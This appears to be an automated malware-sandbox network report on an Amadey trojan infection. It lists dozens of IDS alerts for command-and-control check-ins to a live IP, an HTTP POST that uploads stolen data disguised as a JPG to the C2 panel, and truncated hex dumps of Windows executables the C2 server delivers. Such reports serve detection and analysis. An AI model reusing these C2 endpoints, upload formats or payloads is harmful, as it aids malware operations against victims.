                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50000 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50001 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50002 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50003 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50005 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50006 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50007 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50008 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50010 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50011 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50012 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50014 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50015 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50017 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50019 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50020 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50021 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50022 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50023 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50025 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50027 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50029 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50030 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50031 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50032 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50034 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50035 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50036 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50037 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50039 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50040 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50042 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50043 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50044 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50046 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50047 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50048 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50050 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50052 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50053 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50054 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50056 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50057 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50058 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50059 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50061 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50062 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50063 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50065 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50066 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50067 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50069 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50070 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50071 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50072 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50074 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50075 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50076 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50078 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50079 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50080 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50082 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50083 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50084 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50085 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50087 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50088 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50090 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50091 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50092 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50093 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50095 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50096 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50097 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50098 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50100 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50101 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50103 -> 176.111.174.114:80
                              Posts data to a JPG file (protocol mismatch)Show sources
                              Source: unknownHTTP traffic detected: POST //Hnq8vS/index.php?scr=up HTTP/1.1Host: 176.111.174.114User-Agent: UploadorContent-Type: multipart/form-data; boundary=152138533219.jpgConnection: Keep-AliveContent-Length: 227184Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Apr 2021 20:58:42 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Thu, 29 Apr 2021 20:58:42 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Apr 2021 20:58:42 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Thu, 29 Apr 2021 20:58:42 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Apr 2021 20:58:42 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Thu, 29 Apr 2021 20:58:42 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Apr 2021 20:58:43 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Thu, 29 Apr 2021 20:58:43 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 